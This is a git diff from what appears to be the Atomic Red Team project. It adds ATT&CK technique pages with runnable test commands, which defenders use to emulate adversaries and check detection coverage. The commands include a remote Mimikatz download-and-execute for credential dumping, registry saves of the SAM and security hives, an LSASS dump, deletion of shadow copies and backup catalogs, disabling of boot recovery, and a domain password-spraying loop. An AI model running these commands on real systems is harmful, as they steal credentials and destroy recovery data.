+|  | [Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1117/t1117.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1044/t1044.md) | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1150/t1150.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1181/t1181.md) | [Private Keys](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1145/t1145.md) | [System Owner/User Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1033/t1033.md) | [Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1028/t1028.md) |  |  | [Standard Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1071/t1071.md) |
+|  | [Rundll32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1085/t1085.md) | [Hidden Files and Directories](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1158/t1158.md) | [Port Monitors](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1013/t1013.md) | [File Deletion](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1107/t1107.md) | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1091/t1091.md) | [System Service Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1007/t1007.md) |  |  |  | [Standard Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1032/t1032.md) |
 |  | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1053/t1053.md) | [Hooking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1179/t1179.md) | [Process Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1055/t1055.md) | [File System Logical Offsets](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1006/t1006.md) | [Securityd Memory](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1167/t1167.md) | [System Time Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1124/t1124.md) |  |  |  | [Standard Non-Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1095/t1095.md) |
 |  | [Scripting](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1064/t1064.md) | [Hypervisor](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1062/t1062.md) | [SID-History Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1178/t1178.md) | [Gatekeeper Bypass](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1144/t1144.md) | [Two-Factor Authentication Interception](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1111/t1111.md) |  |  |  |  | [Uncommonly Used Port](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1065/t1065.md) |
 |  | [Service Execution](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1035/t1035.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1183/t1183.md) | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1053/t1053.md) | [HISTCONTROL](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1148/t1148.md) |  |  |  |  |  | [Web Service](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1102/t1102.md) |
@@ -46,7 +46,7 @@
 |  |  | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1053/t1053.md) |  | [Process Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1055/t1055.md) |  |  |  |  |  |  |
 |  |  | [Screensaver](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1180/t1180.md) |  | [Redundant Access](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1108/t1108.md) |  |  |  |  |  |  |
 |  |  | [Security Support Provider](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1101/t1101.md) |  | [Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1121/t1121.md) |  |  |  |  |  |  |
-|  |  | [Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1058/t1058.md) |  | [Regsvr32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1117/t1117.md) |  |  |  |  |  |  |
+|  |  | [Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1058/t1058.md) |  | [Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1117/t1117.md) |  |  |  |  |  |  |
 |  |  | [Shortcut Modification](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1023/t1023.md) |  | [Rootkit](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1014/t1014.md) |  |  |  |  |  |  |
 |  |  | [Startup Items](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1165/t1165.md) |  | [Rundll32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1085/t1085.md) |  |  |  |  |  |  |
 |  |  | [System Firmware](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1019/t1019.md) |  | [SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1198/t1198.md) |  |  |  |  |  |  |
diff --git a/atomics/t1002/t1002.md b/atomics/t1002/t1002.md
new file mode 100644
index 00000000..1b88deb2
--- /dev/null
+++ b/atomics/t1002/t1002.md
@@ -0,0 +1,55 @@
+# T1002 - Data Compressed
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1002)
+<blockquote>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.
+
+Detection: Compression software and compressed files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known compression utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used.
+
+If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)
+
+Platforms: Linux, macOS, Windows
+
+Data Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring
+
+Requires Network: No</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Compress Data for Exfiltration With PowerShell](#atomic-test-1---compress-data-for-exfiltration-with-powershell)
+
+- [Atomic Test #2 - Compress Data for Exfiltration With Rar](#atomic-test-2---compress-data-for-exfiltration-with-rar)
+
+
+<br/>
+
+## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
+TODO
+
+**Supported Platforms:** windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|-------------------------------------------|
+    | input_file | Path that should be compressed into our output file | Path | C:\*|
+    | output_file | Path where resulting compressed data should be placed | Path | C:\test\Data.zip|
+
+#### Run it with `powershell`!
+```
+dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
+
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - Compress Data for Exfiltration With Rar
+TODO
+
+**Supported Platforms:** windows
+
+
+#### Run it with `powershell`!
+```
+rar a -r #{output_file} #{input_file}
+
+```
+<br/>
diff --git a/atomics/t1003/t1003.md b/atomics/t1003/t1003.md
new file mode 100644
index 00000000..218fe316
--- /dev/null
+++ b/atomics/t1003/t1003.md
@@ -0,0 +1,214 @@
+# T1003 - Credential Dumping
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003)
+<blockquote>Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
+
+Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
+
+===SAM (Security Accounts Manager)===
+
+The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command.  To enumerate the SAM database, system level access is required.
+ 
+A number of tools can be used to retrieve the SAM file through in-memory techniques:
+* pwdumpx.exe 
+* gsecdump
+* Mimikatz
+* secretsdump.py
+
+Alternatively, the SAM can be extracted from the Registry with Reg:
+* <code>reg save HKLM\sam sam</code>
+* <code>reg save HKLM\system system</code>
+
+Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)
+
+Notes:
+Rid 500 account is the local, in-built administrator.
+Rid 501 is the guest account.
+User accounts start with a RID of 1,000+.
+
+===Cached Credentials===
+
+The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable.  The number of default cached credentials varies, and this number can be altered per system.  This hash does not allow pass-the-hash style attacks.
+ 
+A number of tools can be used to retrieve the SAM file through in-memory techniques.
+* pwdumpx.exe 
+* gsecdump
+* Mimikatz
+
+Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
+
+Notes:
+Cached credentials for Windows Vista are derived using PBKDF2.
+
+===Local Security Authority (LSA) Secrets===
+
+With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.
+ 
+When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.
+ 
+A number of tools can be used to retrieve the SAM file through in-memory techniques.
+* pwdumpx.exe 
+* gsecdump
+* Mimikatz
+* secretsdump.py
+
+Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
+
+Notes:
+The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.
+Windows 10 adds protections for LSA Secrets described in Mitigation.
+
+===NTDS from Domain Controller===
+
+Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)
+ 
+The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
+ 
+* Volume Shadow Copy
+* secretsdump.py
+* Using the in-built Windows tool, ntdsutil.exe
+* Invoke-NinjaCopy
+
+===Group Policy Preference (GPP) Files===
+
+Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.
+ 
+These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)
+ 
+The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
+ 
+* Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp"
+* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)
+* gpprefdecrypt.py
+ 
+Notes:
+On the SYSVOL share, the following can be used to enumerate potential XML files.
+dir /s *.xml
+
+===Service Principle Names (SPNs)===
+
+See Kerberoasting.
+
+===Plaintext Credentials===
+
+After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.
+ 
+SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.
+
+The following SSPs can be used to access credentials:
+ 
+Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
+Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)
+Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
+CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)
+ 
+The following tools can be used to enumerate credentials:
+ 
+* Windows Credential Editor
+* Mimikatz
+ 
+As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
+ 
+For example, on the target host use procdump:
+* <code>procdump -ma lsass.exe lsass_dump</code>
+ 
+Locally, mimikatz can be run:
+* <code>sekurlsa::Minidump lsassdump.dmp</code>
+* <code>sekurlsa::logonPasswords</code>
+
+===DCSync=== 
+
+DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's  application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller.  Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data  (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in Account Manipulation. (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)
+
+Detection: Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective Process Injection to reduce potential indicators of malicious activity.
+
+Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well. 
+
+On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
+
+Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
+
+Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols  (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
+
+Platforms: Windows
+
+Data Sources: API monitoring, Process command-line parameters, Process monitoring, PowerShell logs
+
+Permissions Required: Administrator, SYSTEM
+
+Contributors: Vincent Le Toux, Ed Williams, Trustwave, SpiderLabs</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Powershell Mimikatz](#atomic-test-1---powershell-mimikatz)
+
+- [Atomic Test #2 - Gsecdump](#atomic-test-2---gsecdump)
+
+- [Atomic Test #3 - Windows Credential Editor](#atomic-test-3---windows-credential-editor)
+
+- [Atomic Test #4 - Registry dump of SAM, creds, and secrets](#atomic-test-4---registry-dump-of-sam-creds-and-secrets)
+
+
+<br/>
+
+## Atomic Test #1 - Powershell Mimikatz
+Dumps Credentials via Powershell by invoking a remote mimikatz script
+
+**Supported Platforms:** windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|-------------------------------------------|
+    | remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1|
+
+#### Run it with `powershell`!
+```
+IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
+
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - Gsecdump
+https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
+
+**Supported Platforms:** windows
+
+
+#### Run it with `command_prompt`!
+```
+gsecdump -a
+
+```
+<br/>
+<br/>
+
+## Atomic Test #3 - Windows Credential Editor
+http://www.ampliasecurity.com/research/windows-credentials-editor/
+
+**Supported Platforms:** windows
+
+
+#### Run it with `command_prompt`!
+```
+wce -o #{output_file}
+
+```
+<br/>
+<br/>
+
+## Atomic Test #4 - Registry dump of SAM, creds, and secrets
+Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated 
+via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
+
+**Supported Platforms:** windows
+
+
+#### Run it with `command_prompt`!
+```
+reg save HKLM\sam sam 
+reg save HKLM\system system
+reg save HKLM\security security
+
+```
+<br/>
diff --git a/atomics/t1107/t1107.md b/atomics/t1107/t1107.md
new file mode 100644
index 00000000..07841464
--- /dev/null
+++ b/atomics/t1107/t1107.md
@@ -0,0 +1,249 @@
+# T1107 - File Deletion
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1107)
+<blockquote>Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.
+
+There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)
+
+Detection: It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.
+
+Platforms: Linux, Windows, macOS
+
+Data Sources: Binary file metadata, File monitoring, Process command-line parameters
+
+Defense Bypassed: Host forensic analysis
+
+Permissions Required: User
+
+Contributors: Walker Johnson</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Victim configuration](#atomic-test-1---victim-configuration)
+
+- [Atomic Test #2 - Delete a single file](#atomic-test-2---delete-a-single-file)
+
+- [Atomic Test #3 - Delete an entire folder](#atomic-test-3---delete-an-entire-folder)
+
+- [Atomic Test #4 - Overwrite and delete a file with shred](#atomic-test-4---overwrite-and-delete-a-file-with-shred)
+
+- [Atomic Test #5 - Victim configuration](#atomic-test-5---victim-configuration)
+
+- [Atomic Test #6 - Delete a single file - cmd](#atomic-test-6---delete-a-single-file---cmd)
+
+- [Atomic Test #7 - Delete an entire folder - cmd](#atomic-test-7---delete-an-entire-folder---cmd)
+
+- [Atomic Test #8 - Delete a single file - ps](#atomic-test-8---delete-a-single-file---ps)
+
+- [Atomic Test #9 - Delete an entire folder - ps](#atomic-test-9---delete-an-entire-folder---ps)
+
+- [Atomic Test #10 - Delete VSS - vssadmin](#atomic-test-10---delete-vss---vssadmin)
+
+- [Atomic Test #11 - Delete VSS - wmic](#atomic-test-11---delete-vss---wmic)
+
+- [Atomic Test #12 - bcdedit](#atomic-test-12---bcdedit)
+
+- [Atomic Test #13 - wbadmin](#atomic-test-13---wbadmin)
+
+
+<br/>
+
+## Atomic Test #1 - Victim configuration
+Create a temporary directory and several files on the victim system for later deletion
+
+**Supported Platforms:** linux
+
+
+#### Run it with `sh`!
+```
+mkdir /tmp/victim-files
+cd /tmp/victim-files
+touch a b c d e f g
+echo "This file will be shredded" > /tmp/victim-shred.txt
+
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - Delete a single file
+Delete a single file from the temporary directory
+
+**Supported Platforms:** linux
+
+
+#### Run it with `sh`!
+```
+rm -f /tmp/victim-files/a
+
+```
+<br/>
+<br/>
+
+## Atomic Test #3 - Delete an entire folder
+Recursively delete the temporary directory and all files contained within it
+
+**Supported Platforms:** linux
+
+
+#### Run it with `sh`!
+```
+rm -rf /tmp/victim-files
+
+```
+<br/>
+<br/>
+
+## Atomic Test #4 - Overwrite and delete a file with shred
+Use the `shred` command to overwrite the temporary file and then delete it
+
+**Supported Platforms:** linux
+
+
+#### Run it with `sh`!
+```
+shred -u /tmp/victim-shred.txt
+
+```
+<br/>
+<br/>
+
+## Atomic Test #5 - Victim configuration
+Create a temporary directory and several files on the victim system for later deletion
+
+**Supported Platforms:** windows
+
+
+#### Run it with `command_prompt`!
+```
+mkdir %TEMP%\victim-files-cmd
+cd %TEMP%\victim-files-cmd
+type nul > a
+type nul > b
+type nul > c
+type nul > d
+type nul > e
+type nul > f
+type nul > g
+mkdir %TEMP%\victim-files-ps
+cd %TEMP%\victim-files-ps
+type nul > a
+type nul > b
+type nul > c
+type nul > d
+type nul > e
+type nul > f
+type nul > g
+
+```
+<br/>
+<br/>
+
+## Atomic Test #6 - Delete a single file - cmd
+Delete a single file from the temporary directory using cmd.exe
+
+**Supported Platforms:** windows
+
+
+#### Run it with `command_prompt`!
+```
+del /f %TEMP%\victim-files-cmd\a
+
+```
+<br/>
+<br/>
+
+## Atomic Test #7 - Delete an entire folder - cmd
+Recursively delete the temporary directory and all files contained within it using cmd.exe
+
+**Supported Platforms:** windows
+
+
+#### Run it with `command_prompt`!
+```
+del /f /S %TEMP%\victim-files-cmd
+
+```
+<br/>
+<br/>
+
+## Atomic Test #8 - Delete a single file - ps
+Delete a single file from the temporary directory using Powershell
+
+**Supported Platforms:** windows
+
+
+#### Run it with `powershell`!
+```
+Remove-Item -path %TEMP%\victim-files-ps\a
+
+```
+<br/>
+<br/>
+
+## Atomic Test #9 - Delete an entire folder - ps
+Recursively delete the temporary directory and all files contained within it using Powershell
+
+**Supported Platforms:** windows
+
+
+#### Run it with `powershell`!
+```
+Remove-Item -path %TEMP%\victim-files-ps -recurse
+
+```
+<br/>
+<br/>
+
+## Atomic Test #10 - Delete VSS - vssadmin
+Delete all volume shadow copies with vssadmin.exe
+
+**Supported Platforms:** windows
+
+
+#### Run it with `command_prompt`!
+```
+vssadmin.exe Delete Shadows /All /Quiet
+
+```
+<br/>
+<br/>
+
+## Atomic Test #11 - Delete VSS - wmic
+Delete all volume shadow copies with wmic
+
+**Supported Platforms:** windows
+
+
+#### Run it with `command_prompt`!
+```
+wmic shadowcopy delete
+
+```
+<br/>
+<br/>
+
+## Atomic Test #12 - bcdedit
+xxx
+
+**Supported Platforms:** windows
+
+
+#### Run it with `command_prompt`!
+```
+bcdedit /set {default} bootstatuspolicy ignoreallfailures
+bcdedit /set {default} recoveryenabled no
+
+```
+<br/>
+<br/>
+
+## Atomic Test #13 - wbadmin
+xxx
+
+**Supported Platforms:** windows
+
+
+#### Run it with `command_prompt`!
+```
+wbdadmin delete catalog -quiet
+```
+<br/>
diff --git a/atomics/t1110/t1110.md b/atomics/t1110/t1110.md
new file mode 100644
index 00000000..dee4a763
--- /dev/null
+++ b/atomics/t1110/t1110.md
@@ -0,0 +1,54 @@
+# T1110 - Brute Force
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110)
+<blockquote>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.
+
+Credential Dumping to obtain password hashes may only get an adversary so far when Pass the Hash is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)
+
+Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
+
+A related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
+
+Detection: It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. 
+
+Monitor authentication logs for system and application login failures of Valid Accounts. If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.
+
+Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.
+
+Platforms: Linux, macOS, Windows
+
+Data Sources: Authentication logs
+
+Permissions Required: User
+
+Contributors: John Strand</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Brute Force Credentials](#atomic-test-1---brute-force-credentials)
+
+
+<br/>
+
+## Atomic Test #1 - Brute Force Credentials
+Creates username and password files then attempts to brute force on remote host
+
+**Supported Platforms:** windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|-------------------------------------------|
+    | input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt|
+    | input_file_passwords | Path to a file containing a list of passwords we will attempt to brute force with | Path | passwords.txt|
+    | remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$|
+    | domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY|
+
+#### Run it with `command_prompt`!
+```
+net user /domain > #{input_file_users}
+echo "Password1" >> #{input_file_passwords}
+echo "1q2w3e4r" >> #{input_file_passwords}
+echo "Password!" >> #{input_file_passwords}
+@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
+```
+<br/>
diff --git a/atomics/t1113/t1113.md b/atomics/t1113/t1113.md
new file mode 100644
index 00000000..78460fe7
--- /dev/null
+++ b/atomics/t1113/t1113.md
@@ -0,0 +1,107 @@
+# T1113 - Screen Capture
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1113)
+<blockquote>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.
+
+===Mac===
+
+On OSX, the native command <code>screencapture</code> is used to capture screenshots.
+
+===Linux===
+
+On Linux, there is the native command <code>xwd</code>. (Citation: Antiquated Mac Malware)
+
+Detection: Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.
+
+Platforms: Linux, macOS, Windows
+
+Data Sources: API monitoring, Process monitoring, File monitoring</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Screencapture](#atomic-test-1---screencapture)
+
+- [Atomic Test #2 - Screencapture (silent)](#atomic-test-2---screencapture-silent)
+
+- [Atomic Test #3 - X Windows Capture](#atomic-test-3---x-windows-capture)
+
+- [Atomic Test #4 - Import](#atomic-test-4---import)
+
+
+<br/>
+
+## Atomic Test #1 - Screencapture
+Use screencapture command to collect a full desktop screenshot
+
+**Supported Platforms:** macos
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|-------------------------------------------|
+    | output_file | xxx
+ | Path | desktop.png|
+
+#### Run it with `bash`!
+```
+screencapture
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - Screencapture (silent)
+Use screencapture command to collect a full desktop screenshot
+
+**Supported Platforms:** macos
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|-------------------------------------------|
+    | output_file | xxx
+ | Path | desktop.png|
+
+#### Run it with `bash`!
+```
+screencapture -x
+```
+<br/>
+<br/>
+
+## Atomic Test #3 - X Windows Capture
+Use xwd command to collect a full desktop screenshot and review file with xwud
+
+**Supported Platforms:** linux
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|-------------------------------------------|
+    | output_file | xxx
+ | Path | desktop.xwd|
+
+#### Run it with `bash`!
+```
+xwd -root -out #{output_file}
+xwud -in #{output_file}
+
+```
+<br/>
+<br/>
+
+## Atomic Test #4 - Import
+Use import command to collect a full desktop screenshot
+
+**Supported Platforms:** linux
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|-------------------------------------------|
+    | output_file | xxx
+ | Path | desktop.png|
+
+#### Run it with `bash`!
+```
+import -window root
+```
+<br/>
diff --git a/atomics/t1115/t1115.md b/atomics/t1115/t1115.md
new file mode 100644
index 00000000..5ec42317
--- /dev/null
+++ b/atomics/t1115/t1115.md
@@ -0,0 +1,54 @@
+# T1115 - Clipboard Data
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1115)
+<blockquote>Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications. 
+
+===Windows===
+
+Applications can access clipboard data by using the Windows API. (Citation: MSDN Clipboard) 
+
+===Mac===
+
+OSX provides a native command, <code>pbpaste</code>, to grab clipboard contents  (Citation: Operating with EmPyre).
+
+Detection: Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.
+
+Platforms: Linux, macOS, Windows
+
+Data Sources: API monitoring</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Utilize Clipboard to store or execute commands from](#atomic-test-1---utilize-clipboard-to-store-or-execute-commands-from)
+
+- [Atomic Test #2 - PowerShell](#atomic-test-2---powershell)
+
+
+<br/>
+
+## Atomic Test #1 - Utilize Clipboard to store or execute commands from
+Add data to clipboard to copy off or execute commands from.
+
+**Supported Platforms:** windows
+
+
+#### Run it with `command_prompt`!
+```
+dir | clip
+clip < readme.txt
+
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - PowerShell
+Utilize PowerShell to echo a command to clipboard and execute it
+
+**Supported Platforms:** windows
+
+
+#### Run it with `powershell`!
+```
+echo Get-Process | clip
+Get-Clipboard | iex
+```
+<br/>
diff --git a/atomics/t1117/t1117.md b/atomics/t1117/t1117.md
